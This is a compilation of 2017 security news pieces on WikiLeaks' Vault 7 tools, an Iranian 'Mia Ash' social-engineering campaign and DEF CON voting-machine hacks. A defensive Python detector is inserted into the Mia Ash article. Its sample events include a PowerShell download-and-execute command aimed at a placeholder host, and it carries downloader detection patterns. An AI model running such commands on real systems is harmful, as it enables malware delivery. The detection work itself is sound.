“[The tool] identifies installed devices like webcams and microphones, either locally or connected by wireless (Bluetooth, WiFi) or wired networks. All processes related to the detected devices (usually recording, monitoring or detection of video/audio/network streams) are also identified and can be stopped by the operator,” WikiLeaks said. “By deleting or manipulating recordings the operator is aided in creating fake or destroying actual evidence of the intrusion operation.”


Dumbo developers pointed out that home security products (e.g. Kaspersky antivirus) may block some of the tool’s functions, and advised users to disable any protections before installation.

WikiLeaks has exposed numerous tools allegedly used by the CIA as part of a leak dubbed Vault 7. The tools detailed so far are designed for hacking Mac OS X devices (Imperial), intercepting SMS messages on Android devices (HighRise), redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Iran-Linked Hackers Use "Mia Ash" Honey Trap to Compromise Targets

1.8.2017 securityweek  BigBrothers
A threat group said to be associated with Iranian government-directed cyber operations is believed to be operating a fake online persona to target organizations in the Middle East with malware, SecureWorks researchers say.

Known as COBALT GYPSY or TG-2889, the threat group was previously associated with various campaigns, including Shamoon attacks, which were apparently orchestrated by multiple groups working together.

Phishing campaigns observed in early 2017 that were aimed at entities in the Middle East and North Africa (MENA), with a focus on Saudi Arabian organizations, and used the PupyRAT open-source remote access Trojan have also been associated with COBALT GYPSY, SecureWorks says.

These likely unsuccessful campaigns were followed by “highly targeted spearphishing and social engineering attacks” from an entity using the online persona Mia Ash. SecureWorks believes that COBALT GYPSY was behind these attacks as well, and the threat group used spearphishing to target telecommunications, government, defense, oil, and financial services organizations in the MENA region.

“Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims. The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016,” the researchers say.

The phishing campaigns observed at the end of 2016 used shortened URLs leading to a macro-enabled Word document that executed a PowerShell command to download additional PowerShell loader scripts for PupyRAT. Successful installation of the malicious program would have provided the attackers with full access to the victims’ systems.

In January, an employee at one of the targeted organizations was contacted via LinkedIn by a purported London-based photographer named Mia Ash, who claimed to be reaching out as part of a worldwide exercise. Following multiple messages about professions, photography, and travels, Mia Ash eventually encouraged the employee to become friends on Facebook and continue the conversation there.

After communicating for several weeks via email, WhatsApp, and likely Facebook, Mia Ash eventually sent a Microsoft Excel document titled “Copy of Photography Survey.xlsm” and encouraged the employee to open “the email at work using their corporate email account so the survey would function properly.” Macros included in the document downloaded the PupyRAT malware.

SecureWorks believes COBALT GYPSY is behind the Mia Ash persona, using it to infect the targeted organizations after the initial campaigns failed. “The group has repeatedly used social media, particularly LinkedIn, to identify and interact with employees at targeted organizations, and then used weaponized Excel documents to deliver RATs such as PupyRAT,” the researchers note.
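The delivery chain described above (a weaponized Office document whose macro launches PowerShell to fetch a second-stage loader) leaves a characteristic parent/child process trail. The following is an added detection example, not SecureWorks' or the page's own code; it uses a constructed, simplified process-creation record format (`host|parent_image|image|command_line`) and constructed sample events rather than any real product's schema.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Office applications whose macros would be the parent of a spawned shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a PowerShell stage-two downloader.
DOWNLOAD_PATTERNS = {
    "web-client download": re.compile(r"downloadstring|downloadfile|downloaddata", re.I),
    "web request cmdlet": re.compile(r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b", re.I),
    "in-memory execution": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "url in command line": re.compile(r"https?://", re.I),
}


@dataclass
class Finding:
    host: str
    severity: str
    reasons: List[str]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> Optional[dict]:
    """Parse one constructed 'host|parent_image|image|command_line' record."""
    parts = line.strip().split("|", 3)
    if len(parts) != 4:
        return None  # malformed record: skip rather than guess
    host, parent, image, cmd = parts
    return {"host": host, "parent": _basename(parent), "image": _basename(image), "cmd": cmd}


def assess(ev: dict) -> Optional[Finding]:
    """Rate one event. An Office parent spawning a script host is the key signal;
    download indicators alone are common admin activity and only rate 'low'."""
    reasons: List[str] = []
    office_chain = ev["parent"] in OFFICE_PARENTS and ev["image"] in SCRIPT_HOSTS
    if office_chain:
        reasons.append(f"{ev['parent']} spawned {ev['image']}")
    hits = [name for name, pat in DOWNLOAD_PATTERNS.items() if pat.search(ev["cmd"])]
    reasons.extend(hits)
    if office_chain and hits:
        severity = "high"      # macro -> PowerShell -> download: the chain in the article
    elif office_chain:
        severity = "medium"    # Office spawning a shell with no download indicator
    elif len(hits) >= 2:
        severity = "low"       # downloader-like command line from a non-Office parent
    else:
        return None
    return Finding(ev["host"], severity, reasons)


def triage(lines) -> List[Finding]:
    findings = []
    for line in lines:
        ev = parse_event(line)
        finding = assess(ev) if ev else None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events; hosts and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    r"WS01|C:\Program Files\Microsoft Office\Office16\EXCEL.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"""powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/survey/loader.ps1')" """,
    r"WS02|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c echo report generated",
    r"WS03|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'powershell.exe -ExecutionPolicy Bypass -c "Invoke-WebRequest http://intranet.example.invalid/patch.ps1 -OutFile C:\Temp\patch.ps1"',
    r"WS04|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe survey.txt",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.severity.upper():6} {f.host}: {'; '.join(f.reasons)}")
```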


Mia Ash, the researchers say, is highly likely fake, although associated with LinkedIn, Facebook, Blogger, and WhatsApp accounts, and several email addresses. The persona appears to have been established in April 2016 or earlier, while the accounts appear to feature supporting material and content originating from other sources.

The LinkedIn profile contains a description of employment at Mia's Photography seemingly taken from the LinkedIn page of a U.S.-based photographer. The images used by Mia Ash, consistent across the various accounts and profiles, were likely taken from the social media accounts belonging to a Romanian photographer.

The researchers also observed that several of Mia Ash’s LinkedIn connections match the names of people associated with the Mia Ash Facebook page, suggesting that the threat actor is initially contacting individuals on LinkedIn, then switching to Facebook. Photography connections were used to project authenticity, but multiple non-photography endorsers located in Saudi Arabia, United States, Iraq, Iran, Israel, India, and Bangladesh appear to be targets working for technology, oil/gas, healthcare, aerospace, and consulting organizations.

These individuals had job titles such as technical support engineer, software developer, and system support, implying elevated access within the corporate network. Threat actors are looking to compromise accounts with admin or elevated access to “quickly access a targeted environment to achieve their objectives.”

“The individuals' locations and industries align with previous COBALT GYPSY targeting and Iranian ideological, political, and military intelligence objectives. These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona,” SecureWorks says.

The security researchers have been tracking multiple COBALT GYPSY campaigns since 2015 and say it is highly likely that the group is connected to Iranian government-directed cyber operations, given that it has launched espionage campaigns against organizations “of strategic, political, or economic importance to Iranian interests.”

According to SecureWorks, the threat group might have created multiple online personae to gain access to targeted computer networks via social engineering. “The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets. The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic,” the researchers conclude.


Hackers Take Over US Voting Machines In Just 90 Minutes
31.7.2017 thehackernews  BigBrothers

Today, election hacking is not just about hacking voting machines; it now also includes hacking and leaking the dirty secrets of the targeted political parties, and there is no better example than last year's US presidential election.
But in countries like America, even hacking electronic voting machines is possible, and in a matter of minutes.
Several hackers reportedly managed to hack into multiple United States voting machines in a relatively short period, in some cases within minutes and in others within a few hours, at the Def Con cybersecurity conference held in Las Vegas this week.
Citing public concern about the integrity and security of American elections, for the first time Def Con hosted a "Voting Machine Village" event, where tech-savvy attendees tried to hack some systems and help catch vulnerabilities.
Voting Machine Village provided 30 different pieces of voting equipment used in American elections in a room, which included Sequoia AVC Edge, ES&S iVotronic, AccuVote TSX, WinVote, and Diebold Expresspoll 4000 voting machines.
And what's horrible? The group of attendees reportedly took less than 90 minutes to compromise these voting machines.
Image Credit: @tjhorner
Members of the Def Con hacking community managed to take complete control of an e-poll book, a piece of election equipment currently in use in dozens of states where voters sign in and receive their ballots.
Other hackers in attendance claimed to have found significant security flaws in the AccuVote TSX, which is currently in use in 19 states, and the Sequoia AVC Edge, used in 13 states.
Another hacker broke into the hardware and firmware of the Diebold TSX voting machine.
Hackers were also able to hack into the WinVote voting machine, which is available on eBay and has long been removed from use in elections due to its vulnerabilities.
Hackers discovered a remote access vulnerability in WinVote's operating system, which exposed real election data that was still stored in the machine.
Another hacker hacked into the Express-Pollbook system and exposed the internal data structure via a known OpenSSL vulnerability (CVE-2011-4109), allowing anyone to carry out remote attacks.
"Without question, our voting systems are weak and susceptible. Thanks to the contributors of the hacker community today, we’ve uncovered even more about exactly how," Jake Braun, a cybersecurity expert at the University of Chicago, told The Register.
"The scary thing is we also know that our foreign adversaries — including Russia, North Korea, Iran — possess the capabilities to hack them too, in the process undermining the principles of democracy and threatening our national security."
Election hacking became a major debate following the 2016 US presidential election, where it was reported that Russian hackers managed to access U.S. voting machines in at least 39 states in the run-up to the election.
However, there is no evidence yet to justify these claims.
Hacking of voting machines is also a major concern in India these days, but the government and election commission have declined to host such an event to test the integrity of the EVMs (Electronic Voting Machines) used in the country's general and state elections.


DEF CON Voting Village – Hackers easily pwned US voting machines
31.7.2017 securityaffairs  BigBrothers

Hackers attending Def Con hacking conference were invited to hack into voting machines used in US past elections to assess their level of security.
DEF CON 2017 – Are voting systems secure? In August 2016, the FBI issued a “flash” alert to election officials across the country confirming that foreign hackers had compromised state election systems in two states.

Although the US has invested heavily in electronic voting systems, their level of security still appears insufficient against a wide range of cyber attacks.

During an interesting session at the DEF CON hacking conference in Las Vegas, experts set up 30 computer-powered ballot boxes used in American elections, simulating the Presidential election. Welcome to the DEF CON Voting Village!


Bradley Barth (@BBB1216BBB) tweeted on Jul 28, 2017: “At the 1st ever Voting Village at #DEFCON, attendees tinker w/ election systems to find vulnerabilities. I'm told they found some new flaws”
The organizers asked participants to physically compromise the systems and hack into them, and the results were disconcerting.

“We encourage you to do stuff that if you did on election day they would probably arrest you,” Johns Hopkins computer scientist Matt Blaze said.

Most of the voting machines in the DEF CON Voting Village were purchased via eBay (Diebold, Sequoia and Winvote equipment), others were bought from government auctions.


In less than 90 minutes hackers succeeded in compromising the voting machines; one of them was hacked wirelessly.

“Without question, our voting systems are weak and susceptible. Thanks to the contributions of the hacker community today, we’ve uncovered even more about exactly how,” said Jake Braun, cybersecurity lecturer at the University of Chicago.

The analysis of the voting machines revealed that some of them were running outdated OS like Windows XP and Windows CE and flawed software such as unpatched versions of OpenSSL.

Some of them had physical ports open that could be used by attackers to install malicious applications to tamper with votes.

Even if physical attacks are easy to spot and stop, some voting machines were using poorly secured Wi-Fi connectivity.

The expert Carsten Schurmann hacked a WinVote system used in previous county elections via Wi-Fi at the DEF CON Voting Village; he exploited the MS03-026 vulnerability in Windows XP to access the voting machine using RDP.


Robert McMillan (@bobmcmillan) tweeted on Jul 28, 2017: “Greetings from the Defcon voting village where it took 1:40 for Carsten Schurmann to get remote access to this WinVote machine.”
Another system could potentially be cracked remotely via the OpenSSL bug CVE-2011-4109, it is claimed.


Kate Conger (@kateconger) tweeted on Jul 29, 2017: “huge cheer just went up in @votingvilllagedc as hackers managed to load Rick Astley video onto a voting machine #defcon25”
The good news is that most of the hacked equipment is no longer used in today’s elections.